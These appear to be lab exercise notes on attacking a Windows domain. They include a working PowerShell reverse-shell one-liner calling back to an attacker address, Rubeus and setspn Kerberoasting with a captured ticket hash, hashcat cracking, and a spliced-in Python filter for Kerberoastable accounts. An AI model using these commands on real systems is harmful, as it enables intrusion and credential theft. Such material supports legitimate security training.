⛹️♂️Exercise
Reference: Web Shell, Reverse Shell (PS)
Netcat Listener
nc -lvnp <port>
Start a listener on the attacker machine
Reverse Shell Payload
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
I managed to gain a reverse shell after accessing the victim's web shell.
Spawning a TTY Shell (Python) - Exercise
python -c 'import pty; pty.spawn("/bin/sh")'
I realized it is not needed to spawn a TTY shell.
Example
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5566
listening on [any] 5566 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.183.0] 49706
python -c 'import pty; pty.spawn("/bin/sh")'
PS C:\windows\system32\>
whoami
PS C:\windows\system32\> whoami
nt authority\system
Enumerating SPNs (Rubeus)
wget rubeus.exe (Kali)
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/bff8d467e73f88ab61e5db290805b9234e4bb360/dotnet%20v4.7.2%20compiled%20binaries/Rubeus.exe?raw=true
┌──(kali㉿kali)-[~/htb/AD]
└─$ mv 'Rubeus.exe?raw=true' Rubeus.exe
Download Rubeus to the attacker's machine
Upload Rubeus.exe using the victim's web shell upload function.
Using the /stats Flag
Gathering stats using Rubeus
PS C:\> .\Rubeus.exe kerberoast /stats
[*] Action: Kerberoasting
[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain : INLANEFREIGHT.LOCAL
[*] Searching path 'LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 7
-------------------------------------
| Supported Encryption Type | Count |
-------------------------------------
| RC4_HMAC_DEFAULT | 7 |
-------------------------------------
----------------------------------
| Password Last Set Year | Count |
----------------------------------
| 2022 | 7 |
----------------------------------
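As an added example (not part of these notes and not Rubeus code), the Python below reproduces the account filter from the LDAP query logged above and the two /stats tables over a constructed set of directory records; the attribute names are real AD attributes, the records are made up. The same filter is what a defender runs to inventory accounts that need long, rotated passwords or an AES-only msDS-SupportedEncryptionTypes.

```python
from collections import Counter
from datetime import datetime

SAM_NORMAL_USER_ACCOUNT = 805306368  # samAccountType value used in the Rubeus LDAP filter
UF_ACCOUNTDISABLED = 0x2             # userAccountControl bit tested by the :1.2.840.113556.1.4.803: rule
# msDS-SupportedEncryptionTypes bits; 0 or unset means the KDC falls back to RC4
ETYPE_FLAGS = {0x4: "RC4_HMAC", 0x8: "AES128_CTS_HMAC_SHA1", 0x10: "AES256_CTS_HMAC_SHA1"}

def is_kerberoastable(acct):
    """Same test as (&(samAccountType=805306368)(servicePrincipalName=*)
    (!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))."""
    return (acct.get("samAccountType") == SAM_NORMAL_USER_ACCOUNT
            and bool(acct.get("servicePrincipalName"))
            and acct["sAMAccountName"].lower() != "krbtgt"
            and not acct.get("userAccountControl", 0) & UF_ACCOUNTDISABLED)

def supported_etypes(acct):
    """Decode the bitmask; unset/zero is reported as RC4_HMAC_DEFAULT, as Rubeus prints it."""
    bits = acct.get("msDS-SupportedEncryptionTypes", 0)
    names = [name for flag, name in ETYPE_FLAGS.items() if bits & flag]
    return ", ".join(names) if names else "RC4_HMAC_DEFAULT"

def kerberoast_stats(accounts):
    """Return the counts behind the /stats tables: total, by etype, by pwdLastSet year."""
    targets = [a for a in accounts if is_kerberoastable(a)]
    return {
        "total": len(targets),
        "by_etype": dict(Counter(supported_etypes(a) for a in targets)),
        "by_pwd_year": dict(Counter(a["pwdLastSet"].year for a in targets)),
    }

# Constructed sample directory records (attribute names are real, values are made up)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "krbtgt", "samAccountType": 805306368, "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"], "pwdLastSet": datetime(2022, 3, 30)},
    {"sAMAccountName": "svc_sql", "samAccountType": 805306368, "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/SQL01.inlanefreight.local:1433"], "pwdLastSet": datetime(2022, 3, 30)},
    {"sAMAccountName": "sqlprod", "samAccountType": 805306368, "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": 0x18,  # AES128 + AES256 only
     "servicePrincipalName": ["MSSQLSvc/SQL02.inlanefreight.local:1433"], "pwdLastSet": datetime(2019, 6, 1)},
    {"sAMAccountName": "backupjob", "samAccountType": 805306368, "userAccountControl": 0x202,  # disabled
     "servicePrincipalName": ["backupjob/veam001.inlanefreight.local"], "pwdLastSet": datetime(2022, 1, 5)},
    {"sAMAccountName": "SQL01$", "samAccountType": 805306369, "userAccountControl": 0x1000,  # machine account
     "servicePrincipalName": ["MSSQLSvc/SQL01.inlanefreight.local"], "pwdLastSet": datetime(2022, 7, 1)},
    {"sAMAccountName": "jdoe", "samAccountType": 805306368, "userAccountControl": 0x200,  # no SPN
     "pwdLastSet": datetime(2021, 2, 2)},
]
```

Calling kerberoast_stats(SAMPLE_ACCOUNTS) keeps only svc_sql and sqlprod; krbtgt, the disabled account, the machine account and the SPN-less user are dropped exactly as the LDAP filter drops them.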
Using the /nowrap Flag
PS C:\> .\Rubeus.exe kerberoast /nowrap
[*] SamAccountName : svc_sql
[*] DistinguishedName : CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[*] ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
[*] PwdLastSet : 3/30/2022 2:14:52 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$D305B2AEF2BBCA08F45B6620A1F31083$78542BBC7308AE64A871910517AE
Enumerating SPNs (Semi Manual Method)
Reference: 🪟Windows - Kerberoasting
setspn.exe
setspn.exe -Q */*
Built-in setspn binary to enumerate SPNs in the domain.
Example
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        kadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL02.inlanefreight.local:1433
CN=sqldev,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
CN=sqltest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/DEVTEST.inlanefreight.local:1433
CN=sqlqa,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/QA001.inlanefreight.local:1433
CN=azureconnect,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        adfsconnect/azure01.inlanefreight.local
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        backupjob/veam001.inlanefreight.local
Target a Single User
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"
Id : uuid-c043c692-759a-4f07-b6d3-642834677789-1
SecurityKeys : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
ValidFrom : 7/7/2022 7:35:05 AM
ValidTo : 7/7/2022 4:31:54 PM
ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
SecurityKey : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey
Hashcat
┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 hashfile /usr/share/wordlists/rockyou.txt